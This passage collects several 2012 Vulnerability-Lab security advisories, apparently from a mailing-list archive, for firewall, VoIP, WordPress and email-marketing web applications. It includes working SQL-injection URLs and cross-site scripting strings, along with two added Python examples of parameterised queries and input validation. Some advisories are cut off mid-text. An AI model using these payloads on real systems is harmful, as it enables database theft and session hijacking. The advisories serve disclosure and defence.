networking features, such as high availability (active/active, active/passive) 
for maximum network uptime, and virtual domain (VDOM) 
capabilities to separate various networks requiring different security policies.

Fortigate appliances are Pentagon & US Military certified.
The military applies high security standards & safeguards outdoor camps, air bases and
offices with Fortigate hardware.

(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate )


Abstract:
=
The Vulnerability-Lab Research Team discovered multiple non-persistent web
vulnerabilities in the FortiGate UTM Appliance Application.


Report-Timeline:

2012-05-07: Researcher Notification & Coordination
2012-05-10: Vendor Notification
2012-06-08: Vendor Response/Feedback
2012-08-30: Vendor Fix/Patch ( FortiOS v4.3.8 B0630 & FortiOS v5.0 B064 )
2012-09-07: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Fortigate
Product: UTM Firewall Appliance Application vFortiGate-5000 
Series;FortiGate-3950 Series;FortiGate-3810A;


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple non-persistent input validation vulnerabilities are detected in the
FortiGate UTM Appliance Application.
The vulnerability allows remote attackers to hijack admin/customer sessions
with required (client-side) user interaction.
Successful exploitation allows an attacker to phish user accounts, hijack sessions,
redirect client-side requests or manipulate website content in client-side
browser requests.


Vulnerable Module(s): (Non-Persistent)
[+] Exception Handling - objusagedlg
[+] WiFi-controller SSID - Topic
[+] Display Message - Title & Message

Picture(s):
../1.png
../2.png


Interface - UTM WAF Web Application [Appliance]
FortiGate-5000 Series; FortiGate-3950 Series; FortiGate-3810A; FortiGate-3600A; FortiGate-3016B; FortiGate-1240B;
FortiGate-800; FortiGate-620B; FortiGate-311B; FortiGate-310B; FortiGate-300A; FortiGate-224B; FortiGate-200B Series


Proof of Concept:
=
The non-persistent vulnerability can be exploited by remote attackers with
medium or high required user interaction.
For demonstration or to reproduce ...


Code Review: Exception Handling - objusagedlg
URL: http://appliance.127.0.0.1:137/objusagedlg?type=220&mkey=

<div style="text-align: center;"><h2>WiFi-controller SSID <span
class="emphasized_msg">[EXECUTES NON-PERSISTENT SCRIPTCODE HERE!]
</span> is used by:</h2><div>Total References: <span
id="total_refcount"></span></div><div class="info_msg"><span id="total_unused">
</span> object types that may be configured to use this object have no
references (<span id="unused_toggle"></span>)</div>
<form name="search_params"><input name="type" value="220" type="hidden"><input
name="mkey" value="" type="hidden">
<iframe src="objusagedlg-Dateien/hack.htm" [EXECUTES NON-PERSISTENT SCRIPTCODE
HERE!]' =<input type="hidden" name="mkey_display" value="" /></form><div
id="reftable-container"></div>


Code Review: Display Message - Title & Message
URL:
https://appliance.127.0.0.1:137/displaymessage?url=/webfilter/profile/dlg&title=

<td>[EXECUTES NON-PERSISTENT SCRIPTCODE HERE!]' = td=
</tr>
</table></td>
</tr>
<tr>
<td class

GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities

2012-10-02 Thread Vulnerability Lab
="secret_hidden" name="secret_hidden" value="" type="hidden"><input
id="allowGenCert" name="allowGenCert"
value="1" type="hidden"><input id="remotePW_hidden" name="remotePW_hidden"
value="" type="hidden">
<iframe src="user-list_data/[PERSISTENT SCRIPT CODE!]' =</td></tr>
<tr>
<td>

... & identity

class="forminput" id="identity"
name="identity" type="text" size="60" maxlength="127"
value="<iframe src=[PERSISTENT SCRIPT CODE!]
&#34;)
/></td>
</tr>

... & fullName

<td colspan="3"><input class="forminput" id="fullName"
name="fullName" type="text" size="60" maxlength="59"
value="<iframe src=a
[PERSISTENT SCRIPT CODE!])
/></td>
</tr>
<tr>

... & desc

<td colspan="3"><input class="forminput" id="desc" name="desc"
type="text" size="60" maxlength="79"
value="<iframe src=a
&#34;[PERSISTENT SCRIPT CODE!])
/></td>
</tr>


... or the secret_hidden

<input id="strength" name="strength" value="95" type="hidden"><input
id="secret_hidden"
name="secret_hidden" value="" type="hidden">[PERSISTENT SCRIPT CODE!])'
=<input
id="allowGenCert" name="allowGenCert" type="hidden" value="1" />


URL:http://gta.127.0.0.1/config/accounts/user/user-fs_en_6.0.3





Review: VPN Certificate - Details Listing

<tr>
<td class="formlabel">Subject:</td>
<td>emailAddress = \[PERSISTENT SCRIPT CODE!]) ,
CN = \[PERSISTENT SCRIPT CODE!]) , O =
[PERSISTENT SCRIPT CODE!] , L =
[PERSISTENT SCRIPT CODE!]) , ST =
[PERSISTENT SCRIPT CODE!]) , C = US, OU =
i[PERSISTENT SCRIPT CODE!]) </td>
</tr>

Note: The vulnerable certificate content can also be exported via the download
function to review the problem.

URL: http://gta.127.0.0.1/config/vpn/certs/certs-fs_en_6.0.3


Solution:
=
Parse the input field values secret_hidden, remotePW_hidden, identity, the form
inputs desc and fullName, and emailAddress.
Restrict the name input fields with a special filter when processing, so that
strings with tags and delimiters (such as <, >, double quotes & co. ...) are not loaded.
Also parse the vulnerable output listing where the script code is executed
unsanitized out of the WAF application context.


Risk:
=
The vulnerabilities can be exploited with low required user interaction & a
privileged user account.
The security risk of the persistent input validation vulnerabilities is
estimated as medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY ADMINISTRATION
CONTACT: ad...@vulnerability-lab.com




Switchvox Asterisk v5.1.2 - Multiple Web Vulnerabilities

2012-10-02 Thread Vulnerability Lab
 the poc press on test CRM Settings
3- Setup - Groups - Create Extension Group [Note]
4- Setup - Outgoing calls - Create Outgoing Call rule [Note]
5- Setup - Incoming Calls - Caller DID routes - Create Single DID Route 
[Note]
6- Setup - Incoming Calls - Caller ID Rules - Create Call transfer Call 
[Note]


1.
URL: 
https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=modify_sound&sound_id=478


<div class="desc_div"><b>Description:</b> Your new password must be different
than your old password.
Please try again.<br>[PERSISTENT INJECTED SCRIPT CODE!]<br/>[PERSISTENT
INJECTED SCRIPT CODE!])</ifram></iframe></div>



2.
URL: 
https://asterisk-switchvox.127.0.0.1:1337/admin?plugin_name=sugarcrm&admin_sbplugins_id=1&cmd=modify_crm_plugin&sugarcrm=1


[1101],plugin_type:system,plugin_description:Lookup up and display 
contact information straight from your SugarCRM 
server.,plugin_display:SugarCRM,plugin_name:sugarcrm,admin_sbplugins_id:1,proxy:http://\[PERSISTENT
 INJECTED SCRIPT CODE!])
/iframe,uri:http://\[PERSISTENT INJECTED SCRIPT CODE!])


3.
URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=extension_groups


<div style="margin-right: 5px; display: none;"><div style="width: 400px;"
class="pwm_container_padding"><div>[PERSISTENT INJECTED SCRIPT CODE!])
</iframe>'[PERSISTENT INJECTED SCRIPT CODE!])</iframe>[PERSISTENT
INJECTED SCRIPT CODE!])
</iframe>'</iframe></div><div class="clear"></div></div></div></div>
<div style="display: none;" class="pwm_top_arrow"></div><div style="left:
187px; top: 354px;" class="pwm_bottom_arrow"></div>


4.
URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=add_outgoing_rule


{call_through:{internal:{}},priority:9,name:test,description:\[PERSISTENT
 INJECTED SCRIPT CODE!])/iframe \
[PERSISTENT INJECTED SCRIPT 
CODE!],failovers:{},is_final:0,pattern:Begins with 13 and the 
remainder is 23 to 90 digits in 
length,id:103,context_type:USER}],total_items:9}},allExtensions:


5.
URL: 
https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=incoming_rules&passthrough=1#pageTab=did_routes

code 

number:123,name:test,note:\[PERSISTENT INJECTED SCRIPT 
CODE!])/iframe,force_fax:0,any_provider:1,type:route_number,id:3,call_type:0},
{priority:2,action:busy,type:catchall_unknown_route,id:1}],total_items:3}},switchvox_version:40062,
menu_structure:[{children:[{children:[{cmd:view_extensions,id:manage_extensions,display:Manage},{cmd:extension_groups,id:extension_groups,display:Groups},{cmd:extension_templates,id:extension_templates,display:Templates},
{cmd:extension_permissions,id:extension_permissions,display:Permissions},{cmd:phone_setup,id:extension_phones,display:Phones},
{cmd:extension_settings,id:extension_settings,display:Settings}],id:extensions,column:1,display:Extensions},{children:
[{cmd:channel_groups,id:channel_groups,display:Channel 
Groups},{cmd:voip_providers,id:voip_providers,display:VOIP 
Providers},
{cmd:outgoing_rules,id:outgoing_calls,display:Outgoing Calls},


6.
URL: 
https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=incoming_rules#pageTab=caller_id_rules


Risk:
=
The security risk of the persistent input validation vulnerabilities is
estimated as medium(+).



Credits:

Vulnerability Laboratory [Research Team]  - Ibrahim M. El-Sayed (the StOrM)
(st...@vulnerability-lab.com) [http://iel-sayed.blogspot.com]




Better WP Security v3.4.3 Wordpress - Web Vulnerabilities

2012-10-02 Thread Vulnerability Lab
Title:
==
Better WP Security v3.4.3 Wordpress - Web Vulnerabilities


Date:
=
2012-08-20


References:
===
http://www.vulnerability-lab.com/get_content.php?id=691


VL-ID:
=
691


Common Vulnerability Scoring System:

3.5


Introduction:
=
plugin thereby ensuring that as many security holes as possible are patched 
without having to worry about 
conflicting features or the possibility of missing anything on your site. With 
one-click activation for most 
features as well as advanced features for experienced users Better WP Security 
can help protect any site.

(Copy of the Vendor Homepage: 
http://wordpress.org/extend/plugins/better-wp-security/  )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple persistent web 
vulnerabilities in the Better WP security v3.4.3 Wordpress Application Addon.


Report-Timeline:

2012-08-21: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the Better
WP Security v3.4.3 Wordpress Application Addon.
The vulnerability allows remote attackers to hijack website customer, moderator
or admin sessions with medium or high required user
interaction. The bugs are located on the server side in the Limit Login Attempts,
Exception Handling Error & Intrusion Detection modules, with the
bound vulnerable email address & error parameters. Successful exploitation can
result in Wordpress application account theft, client-side
phishing & client-side content request manipulation. Exploitation requires
medium or high user interaction & no privileged
web application user account.

Vulnerable Module(s):
[+] Better WP Security - Limit Login Attempts & Intrusion Detection
[+] Exception Handling Error

Vulnerable Parameter(s):
[+] Email Address
[+] Error


Proof of Concept:
=
The persistent vulnerability can be exploited by remote attackers with low
required user interaction & a low privileged
application user account. For demonstration or to reproduce ...

Inject the following example string into the application input (persistent) or
parameter (client side)
String:  <iframe src=http://www.vulnerability-lab.com></iframe>


Review: Listings

<tr valign="top">
<th scope="row" class="settinglabel">
<label for="ll_emailaddress">Email Address</label>
</th>
<td class="settingfield">
<input id="ll_emailaddress" name="ll_emailaddress" value="\" type="text">
[PERSISTENT INJECTED SCRIPT CODE!])' = ad...@vulnerability-lab.com=


Review: Exception Handling

<div class="error" style="text-align: center;"><p style="color: red; font-size:
14px; font-weight:
bold;">Attention !</p><p>
Please add this site now to your <a target="_blank"
href="http://managewp.com/wp-admin">ManageWP.com</a> account.
Or deactivate the Worker plugin to avoid <a target="_blank"
href="http://managewp.com/user-guide/security">security issues</a>.
</p></div><div id="message" class="error"><p>Login time period needs to be aan
integer greater than 0.</p></div>
<div id="message" class="error"><p>\[PERSISTENT INJECTED SCRIPT CODE!])'
= is=
not= a= valid= ip.= p=</div>


Solution:
=
The vulnerabilities can be patched by parsing the email address & error
exception handling parameters and the output listing.


Risk:
=
The security risk of the persistent input validation vulnerabilities are 
estimated as medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)




Omnistar Mailer v7.2 - Multiple Web Vulnerabilities

2012-10-03 Thread Vulnerability Lab
):
[+] Form Name


Proof of Concept:
=
1.1
The SQL injection vulnerabilities can be exploited by remote attackers without
user interaction. For demonstration or to reproduce ...

PoC:
http://127.0.0.1:1337/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#
http://127.0.0.1:1337/mailer/admin/preview.php?id=-2'+union+Select+1--%20-
http://127.0.0.1:1337/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list
http://127.0.0.1:1337/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#

http://127.0.0.1:1337/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-
http://127.0.0.1:1337/mailertest/admin/pages.php?op=edit&id=16&form_id=2'
http://127.0.0.1:1337/mailertest/admin/contacts.php?op=edit&id=3&form_id=2'
http://127.0.0.1:1337/mailertest/users/index.php?profile=1&form_id=2'
http://127.0.0.1:1337/mailertest/users/register.php?form_id=2'

--- SQL Exception ---
SQL error (You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right 
syntax to use near ''9''' at line 3)
in (
select 
navname,form_id,auto_subscribe,approve_members,confirm_email,signup_redirect,email_forward
from mailer75_navlinks
where nav_id='9''
)



1.2
The persistent input validation vulnerability can be exploited by remote
attackers with low required user interaction & a low
privileged user account. For demonstration or to reproduce ...

The attacker creates a form and inserts their own malicious javascript or html
code in the form name field.
To create the form the attacker goes to
Customise Interface - Create Website Forms - Create Standard Registration
Form - Add form
and then injects the malicious script code, i.e. <iframe src=www.vuln-lab.com
onload=alert("VL")/>
When the user browses the forms page in the control panel, or any user tries
to register for the website,
the persistent injected script code will be executed out of the web application
context.


Risk:
=
1.1
The security risk of the blind SQL injection vulnerability is estimated as
critical.

1.2
The security risk of the persistent input validation vulnerability is estimated 
as medium(+).



Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]






Interspire Email Marketer v6.0.1 - Multiple Vulnerabilites

2012-10-09 Thread Vulnerability Lab
 exploitation of the vulnerability
results in account theft, client-side phishing
or client-side content request manipulation.

Vulnerable Module(s):
[+] dynamiccontenttags

Vulnerable File(s):
[+] admin/index.php?Page=Addons&Addon=dynamiccontenttags

Vulnerable Parameter(s):
[+] Action


Proof of Concept:
=
1.1
The SQL injection vulnerability can be exploited by remote attackers without
user interaction. For demonstration or to reproduce ...

PoC:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Addons&Addon=dynamiccontenttags&Action=Edit&id=-1%27+UNION+Select+1,2,3,4--%20-

http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Addons&Addon=dynamiccontenttags&Action=Edit&id=-1%27+UNION+Select+1,version%28%29,3,4--%20-
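The Omnistar Mailer SQL exception earlier on this page (the query ending in
where nav_id='9'') and the Interspire id parameter above share one root cause: a
request value pasted into the statement text, so a quote character alters the SQL
the database parses. The following is an added example and not code from either
vendor or from the advisory. It rebuilds the lookup in Python against an in-memory
sqlite3 copy of the mailer75_navlinks table and columns named in the Omnistar
error; the column types and the two sample rows are constructed for the example.
The concatenated query is kept only to show the parse failure the advisory
quotes; the parameterised version beside it is the fix.

```python
import sqlite3

# Constructed stand-in for the table and columns named in the advisory's
# SQL error (mailer75_navlinks); column types and rows are made up here.
SCHEMA = """
CREATE TABLE mailer75_navlinks (
    nav_id          INTEGER PRIMARY KEY,
    navname         TEXT,
    form_id         INTEGER,
    auto_subscribe  INTEGER,
    approve_members INTEGER,
    confirm_email   INTEGER,
    signup_redirect TEXT,
    email_forward   TEXT
)
"""
SAMPLE_ROWS = [
    (9, "Newsletter", 2, 1, 0, 1, "/thanks", ""),
    (18, "Partners", 3, 0, 1, 1, "/partners", "partners@example.invalid"),
]
COLUMNS = ("navname, form_id, auto_subscribe, approve_members, "
           "confirm_email, signup_redirect, email_forward")


def open_db():
    """In-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany(
        "INSERT INTO mailer75_navlinks VALUES (?, ?, ?, ?, ?, ?, ?, ?)", SAMPLE_ROWS
    )
    return conn


def lookup_navlink_unsafe(conn, nav_id):
    """The pattern the advisory's error message reveals: the request value is
    pasted into the statement text, so a stray quote changes the SQL syntax."""
    sql = f"SELECT {COLUMNS} FROM mailer75_navlinks WHERE nav_id='{nav_id}'"
    return conn.execute(sql).fetchone()


def lookup_navlink_safe(conn, nav_id):
    """Hardened form: the value is bound as a parameter and is never parsed
    as SQL, whatever characters it contains."""
    sql = f"SELECT {COLUMNS} FROM mailer75_navlinks WHERE nav_id = ?"
    return conn.execute(sql, (nav_id,)).fetchone()


def unsafe_query_breaks(conn, nav_id):
    """True when the concatenated query fails to parse on this input, which is
    the 'SQL error ... near ''9''' at line 3' symptom quoted in the advisory."""
    try:
        lookup_navlink_unsafe(conn, nav_id)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = open_db()
    print(lookup_navlink_safe(db, 9))       # the Newsletter row
    print(lookup_navlink_safe(db, "9'"))    # None: no row has that id
    print(unsafe_query_breaks(db, "9'"))    # True: the parse error from the page
```

Binding the parameter is the whole fix; a separate check that the id is an
integer before the query is still worth adding, because parameterisation stops
the value from being interpreted as SQL but does not validate it.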


1.2
The persistent input validation vulnerabilities can be exploited by remote
attackers with low or medium required user interaction
& a low privileged user account. For demonstration or to reproduce ...


1.2.1
The attacker can create a user, injecting malicious code, i.e.
<iframe src=http://www.vulnerability-lab.com onload=alert("VL")></iframe>, in
the field Full name.
When the admin views the users the code gets executed. The attacker can also
change his full name in the settings,
and whenever the admin checks the user list the code gets executed.

URL: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Users&Action=Add


1.2.2
The attacker can create a user group and inject malicious code in the group
name. Whenever the victim lists the user groups,
the code gets executed in the victim's browser.

URL:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=UsersGroups&Action=createGroup

1.2.3
The attacker can inject malicious code on the server side by adding a
contact. The attacker goes to Contacts - add contact
and tries to inject malicious code in the email field. An error message
pops up that the email is invalid. To bypass
this message, the attacker creates a normal user with any email, i.e.
t...@test.com. After creating the user, the attacker edits
the user and changes the email to the malicious code. The error message does not
show up and the code is executed for any
user who lists the contacts.

URL:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Subscribers&Action=View&List=7&id=5019
URL:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Subscribers&Action=Add


1.2.4
The attacker can inject malicious code on the server side by creating a
content block from the Dynamic content tags section.
The block name field is vulnerable. Whenever the victim views the blocks the
code gets executed.

URL:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Addons&Addon=dynamiccontenttags&Action=edit

1.2.5
Finally, any of these activities gets logged in the recent activity module,
which is shown on every screen of the web app.
If the attacker has carried out any of the previous persistent malicious
actions, the code will be executed
again in the recent activity module.
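Case 1.2.3 is a validation gap rather than a missing escape: the email check runs
on the add path but not on the edit path, and 1.2.5 shows that whatever gets
stored is then replayed on every screen through the activity feed. As an added
example (not Interspire code), the Python below routes every write through one
validator, so the edit path cannot store a value the add path rejected, and the
activity feed only ever records validated values. The allowlist patterns, the
in-memory store and the sample contact are constructed for the illustration.

```python
import re

# Constructed allowlists for this example (not Interspire's own rules):
# a mailbox address with a dotted host, and a display name that may not
# contain tag or attribute delimiters.
_EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
_NAME_RE = re.compile(r"[^<>\"'&]{1,64}")


def validate_email(value):
    if not isinstance(value, str) or not _EMAIL_RE.fullmatch(value):
        raise ValueError("invalid email address")
    return value


def validate_name(value):
    if not isinstance(value, str) or not _NAME_RE.fullmatch(value):
        raise ValueError("invalid name")
    return value


class ContactStore:
    """Contacts plus the activity feed; every write path uses one validator."""

    def __init__(self):
        self.contacts = {}
        self.activity = []      # what a 'recent activity' panel would list
        self._next_id = 1

    @staticmethod
    def _validated(full_name, email):
        # Single choke point: add and edit both come through here, so a value
        # rejected at creation cannot be slipped in later through an edit.
        return {"full_name": validate_name(full_name),
                "email": validate_email(email)}

    def add_contact(self, full_name, email):
        record = self._validated(full_name, email)
        cid = self._next_id
        self._next_id += 1
        self.contacts[cid] = record
        self.activity.append(("add", cid, record["full_name"]))
        return cid

    def update_contact(self, cid, full_name, email):
        if cid not in self.contacts:
            raise KeyError(cid)
        record = self._validated(full_name, email)   # same checks as add
        self.contacts[cid] = record
        self.activity.append(("edit", cid, record["full_name"]))


def update_rejected(store, cid, full_name, email):
    """True when the edit path refuses the value (and leaves the record intact)."""
    try:
        store.update_contact(cid, full_name, email)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    store = ContactStore()
    cid = store.add_contact("Test User", "test@example.invalid")
    print(update_rejected(store, cid, "Test User", "<iframe src=x>"))   # True
    print(store.contacts[cid]["email"])                                  # unchanged
```

Validation at the write path is the first layer; the values still have to be
escaped wherever they are rendered (user list, group list, activity feed), since a
later code path may add a field the allowlist never saw.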

1.3
PoC:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Addons&Addon=dynamiccontenttags&Action=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20onload=alert%28%22VL%22%29%3C/iframe%3E



Risk:
=
1.1
The security risk of the remote SQL Injection vulnerability is estimated as 
critical.

1.2
The security risk of the persistent input validation vulnerabilities are 
estimated as medium(+).

1.3
The security risk of the client side cross site scripting vulnerability is 
estimated as low(+).


Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]



GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities

2012-10-09 Thread Vulnerability Lab
=hiddeninput id=strength name=strength 
value=95 type=hiddeninput 
id=secret_hidden name=secret_hidden value= type=hiddeninput 
id=allowGenCert name=allowGenCert 
value=1 type=hiddeninput id=remotePW_hidden name=remotePW_hidden 
value= type=hidden
iframe src=user-list_data/[PERSISTENT SCRIPT CODE!]' =/td/tr
tr
td

...  identity

<input class="forminput" id="identity" name="identity" type="text" size="60" maxlength="127" value="<iframe src=[PERSISTENT SCRIPT CODE!]&#34;)" /></td>
</tr>

...  fullName

<td colspan="3"><input class="forminput" id="fullName" name="fullName" type="text" size="60" maxlength="59" value="<iframe src=a [PERSISTENT SCRIPT CODE!])" /></td>
</tr>
<tr>

...  desc

<td colspan="3"><input class="forminput" id="desc" name="desc" type="text" size="60" maxlength="79" value="<iframe src=a &#34;[PERSISTENT SCRIPT CODE!])" /></td>
</tr>


... or the secret_hidden

<input id="strength" name="strength" value="95" type="hidden"><input id="secret_hidden" name="secret_hidden" value="" type="hidden">[PERSISTENT SCRIPT CODE!])' ="><input id="allowGenCert" name="allowGenCert" type="hidden" value="1" />


URL:http://gta.127.0.0.1/config/accounts/user/user-fs_en_6.0.3





Review: VPN Certificate - Details Listing

<tr>
<td class="formlabel">Subject:</td>
<td>emailAddress = \[PERSISTENT SCRIPT CODE!]) , CN = \[PERSISTENT SCRIPT CODE!]) , O = [PERSISTENT SCRIPT CODE!] , L = [PERSISTENT SCRIPT CODE!]) , ST = [PERSISTENT SCRIPT CODE!]) , C = US, OU = i[PERSISTENT SCRIPT CODE!]) </td>
</tr>

Note: The vulnerable certificate content can also be exported via the download 
function to review the problem.

URL: http://gta.127.0.0.1/config/vpn/certs/certs-fs_en_6.0.3


Solution:
=
Encode the input field values secret_hidden, remotePW_hidden, identity, desc, 
fullName & emailAddress before they are written back into the page. 
Restrict the name input fields with a filter that rejects or encodes the 
characters needed to form tags or to break out of an attribute (<, >, double 
and single quotes & co. ...). 
Also encode the vulnerable output listings (user list and VPN certificate 
details) where the injected script code currently executes unsanitized inside 
the firewall's web application context.

Note:   Your company can use the following public, non-malicious string list to 
verify or update ...
URL:http://www.vulnerability-lab.com/resources/documents/531.txt


Risk:
=
The vulnerabilities can be exploited with low required user interaction & a 
privileged user account.
The security risk of the persistent input validation vulnerabilities is 
estimated as medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com




Endpoint Protector v4.0.4.0 - Multiple Web Vulnerabilities

2012-10-09 Thread Vulnerability Lab
EXECUTION!]' =" size="30">
 Example: w2003server
</div>



Review: List of Computers, Users or Groups in Details Edit Checklist Name

<ul class="sf_admin_checklist">
<li><input name="associated_group[]" id="associated_group_1" value="1" type="checkbox"> <label for="associated_group_1">sali</label></li>
<li><input name="associated_group[]" id="associated_group_2" value="2" type="checkbox"> <label for="associated_group_2">allow</label></li>
<li><input name="associated_group[]" id="associated_group_3" value="3" type="checkbox"> <label for="associated_group_3">IT Support</label></li>
<li><input name="associated_group[]" id="associated_group_4" value="4" type="checkbox"> <label for="associated_group_4">allowvpn</label></li>
<li><input name="associated_group[]" id="associated_group_5" value="5" type="checkbox"> <label for="associated_group_5">Gruppe-No-USB</label></li>
<li><input name="associated_group[]" id="associated_group_6" value="6" type="checkbox"> <label for="associated_group_6"><iframe src="Endpoint%20Protector%204%20-%20Reporting%20and%20Administration%20Tool-5-[PERSISTENT SCRIPT CODE CONTEXT EXECUTION!]' =" label=""></li>
</ul>


Risk:
=
The security risk of the persistent input validation vulnerabilities is 
estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)






vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities

2012-10-10 Thread Vulnerability Lab
. For demonstration or reproduce ...

MSN Stealer:
The MSN stealer module inside the application displays the bot's name 
unsanitized. To infect the attacker back, the victim can simulate a fake MSN 
account login on an infected system with malicious persistent script code as 
the bot's name. The result is persistent script code execution out of the 
bot's-name web context in the messenger listing. The victim can then hijack the 
vOlk botnet panel sessions or manipulate the framework with their own malicious 
persistent content to stop, block, take over or disable the service.
  
Review: MSN STEALER - BOTS NAME

<tbody><tr>
<td width="2%"><div align="center"><font color="#FF" face="Verdana" size="1"><b>ID</b></font></div></td>
<td width="12%"><div align="center"><b><font color="#FF" face="Verdana" size="1">Bot's Name</font></b></div></td>
<td width="6%"><div align="center"><b><font color="#FF" face="Verdana" size="1">Pais</font></b></div></td>
<td width="79%"><div align="center"><b><font color="#FF" face="Verdana" size="1">Login de msnmsgr.exe</font></b></div></td>
</tr>
<tr>
<td><div align="center"><font color="#CC">1</font></div><font color="#CC"></font></td>
<td><div align="center"><font color="#CC">[[PERSISTENT INJECTED SCRIPT CODE!]]</font></div><font color="#CC"></font></td>



Review: Visit Webpage - Open URL

<table style="border-style:solid; border-width:1px;" background="archivos/imagen/fondo.png" height="69" width="96%">
  <tbody><tr>
<td align="left" bgcolor="#33" height="26" width="29%"><font color="#FF" face="Verdana" size="1">Open URL Bots: </font></td>
<td align="left" bgcolor="#33" width="68%"><div><span style="margin-left:0px" name="div_1_mensaje" id="div_1_mensaje"><font face="Verdana" size="1">
  <input name="domin" id="domin" style="border:1px solid #FF; width: 420; color:#66; font-family:Verdana; font-size:8pt; background-color:#00; float:left; height:17" value="[[PERSISTENT INJECTED SCRIPT CODE!]];) =" size="1">
</font></span></div></td>
  </tr>


Review: Download File

<table style="border-style:solid; border-width:1px;" background="archivos/imagen/fondo.png" height="83" width="99%">
  <tbody><tr>
<td align="left" bgcolor="#33" height="19" width="29%"><font color="#FF" face="Verdana" size="1">Download url:</font></td>
<td align="left" bgcolor="#33" height="19" width="68%"><div><font face="Verdana" size="1">
  <input name="https" id="https" style="border:1px solid #FF; width: 394; font-family:Verdana; font-size:8pt; color:#66; background-color:#00; float:left; height:17" value="http://www.;[[PERSISTENT INJECTED SCRIPT CODE!]];) .com=" size="1">
</font></span></div></td>
  </tr>


Review: Settings - Administrator Username  Administrator Password

<tbody><tr>
<td align="left" bgcolor="#33" height="21" width="30%"><font color="#FF" face="Verdana" size="1">User Administrator :</font></td>
<td align="left" bgcolor="#33" width="70%"><div>
<span style="margin-left:0px" name="div_1_mensaje" id="div_1_mensaje">
<font face="Verdana" size="1">
<input style="border:1px solid #FF; width: 300px; font-family:Verdana; font-size:8pt; color:#66; background-color:#00" value="[[PERSISTENT INJECTED SCRIPT CODE!]]" disabled="disabled" name="User" id="User" size="1" type="text">[[PERSISTENT INJECTED SCRIPT CODE!]]
</font></span>
</div></td>
</tr>



<tr>
<td align="left" bgcolor="#33" height="21" width="30%"><font color="#FF" face="Verdana" size="1">Password Administrator :</font></td>
<td align="left" bgcolor="#33" width="70%">
